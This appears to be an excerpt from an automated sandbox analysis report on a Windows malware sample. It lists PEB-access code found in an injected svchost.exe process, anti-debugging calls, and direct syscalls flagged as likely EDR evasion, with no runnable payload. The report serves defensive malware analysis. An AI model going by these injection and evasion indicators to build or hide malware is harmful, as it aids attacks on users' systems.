            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035304E5 mov ecx, dword ptr fs:[00000030h]1_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA49A mov eax, dword ptr fs:[00000030h]1_2_035EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035644B0 mov ecx, dword ptr fs:[00000030h]1_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BA4B0 mov eax, dword ptr fs:[00000030h]1_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035364AB mov eax, dword ptr fs:[00000030h]1_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEB50 mov eax, dword ptr fs:[00000030h]1_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h]1_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4B4B mov eax, dword ptr fs:[00000030h]1_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h]1_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6B40 mov eax, dword ptr fs:[00000030h]1_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FAB40 mov eax, dword ptr fs:[00000030h]1_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D8B42 mov eax, dword ptr fs:[00000030h]1_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352CB7E mov eax, dword ptr fs:[00000030h]1_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03602B57 mov eax, dword ptr fs:[00000030h]1_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AEB1D mov eax, dword ptr fs:[00000030h]1_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h]1_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EB20 mov eax, dword ptr fs:[00000030h]1_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h]1_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F8B28 mov eax, dword ptr fs:[00000030h]1_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEBD0 mov eax, dword ptr fs:[00000030h]1_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550BCB mov eax, dword ptr fs:[00000030h]1_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530BCD mov eax, dword ptr fs:[00000030h]1_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538BF0 mov eax, dword ptr fs:[00000030h]1_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EBFC mov eax, dword ptr fs:[00000030h]1_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BCBF0 mov eax, dword ptr fs:[00000030h]1_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h]1_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540BBE mov eax, dword ptr fs:[00000030h]1_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h]1_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E4BB0 mov eax, dword ptr fs:[00000030h]1_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536A50 mov eax, dword ptr fs:[00000030h]1_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h]1_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540A5B mov eax, dword ptr fs:[00000030h]1_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h]1_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035ACA72 mov eax, dword ptr fs:[00000030h]1_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA6F mov eax, dword ptr fs:[00000030h]1_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DEA60 mov eax, dword ptr fs:[00000030h]1_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BCA11 mov eax, dword ptr fs:[00000030h]1_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h]1_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03554A35 mov eax, dword ptr fs:[00000030h]1_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356CA24 mov eax, dword ptr fs:[00000030h]1_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355EA2E mov eax, dword ptr fs:[00000030h]1_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530AD0 mov eax, dword ptr fs:[00000030h]1_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h]1_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564AD0 mov eax, dword ptr fs:[00000030h]1_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586ACC mov eax, dword ptr fs:[00000030h]1_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h]1_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356AAEE mov eax, dword ptr fs:[00000030h]1_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568A90 mov edx, dword ptr fs:[00000030h]1_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353EA80 mov eax, dword ptr fs:[00000030h]1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604A80 mov eax, dword ptr fs:[00000030h]1_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h]1_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538AA0 mov eax, dword ptr fs:[00000030h]1_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03586AA4 mov eax, dword ptr fs:[00000030h]1_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B0946 mov eax, dword ptr fs:[00000030h]1_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h]1_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4978 mov eax, dword ptr fs:[00000030h]1_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC97C mov eax, dword ptr fs:[00000030h]1_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03556962 mov eax, dword ptr fs:[00000030h]1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov eax, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov edx, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E mov eax, dword ptr fs:[00000030h]1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC912 mov eax, dword ptr fs:[00000030h]1_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528918 mov eax, dword ptr fs:[00000030h]1_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528918 mov eax, dword ptr fs:[00000030h]1_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h]1_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE908 mov eax, dword ptr fs:[00000030h]1_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B892A mov eax, dword ptr fs:[00000030h]1_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C892B mov eax, dword ptr fs:[00000030h]1_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h]1_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035649D0 mov eax, dword ptr fs:[00000030h]1_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FA9D3 mov eax, dword ptr fs:[00000030h]1_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C69C0 mov eax, dword ptr fs:[00000030h]1_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h]1_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h]1_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE9E0 mov eax, dword ptr fs:[00000030h]1_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B89B3 mov esi, dword ptr fs:[00000030h]1_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B89B3 mov eax, dword ptr fs:[00000030h]1_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B89B3 mov eax, dword ptr fs:[00000030h]1_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h]1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035309AD mov eax, dword ptr fs:[00000030h]1_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035309AD mov eax, dword ptr fs:[00000030h]1_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03560854 mov eax, dword ptr fs:[00000030h]1_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534859 mov eax, dword ptr fs:[00000030h]1_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534859 mov eax, dword ptr fs:[00000030h]1_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03542840 mov ecx, dword ptr fs:[00000030h]1_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE872 mov eax, dword ptr fs:[00000030h]1_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE872 mov eax, dword ptr fs:[00000030h]1_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6870 mov eax, dword ptr fs:[00000030h]1_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6870 mov eax, dword ptr fs:[00000030h]1_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC810 mov eax, dword ptr fs:[00000030h]1_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov ecx, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552835 mov eax, dword ptr fs:[00000030h]1_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A830 mov eax, dword ptr fs:[00000030h]1_2_0356A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D483A mov eax, dword ptr fs:[00000030h]1_2_035D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D483A mov eax, dword ptr fs:[00000030h]1_2_035D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E8C0 mov eax, dword ptr fs:[00000030h]1_2_0355E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036008C0 mov eax, dword ptr fs:[00000030h]1_2_036008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C8F9 mov eax, dword ptr fs:[00000030h]1_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C8F9 mov eax, dword ptr fs:[00000030h]1_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FA8E4 mov eax, dword ptr fs:[00000030h]1_2_035FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC89D mov eax, dword ptr fs:[00000030h]1_2_035BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530887 mov eax, dword ptr fs:[00000030h]1_2_03530887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352CF50 mov eax, dword ptr fs:[00000030h]1_2_0352CF50
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
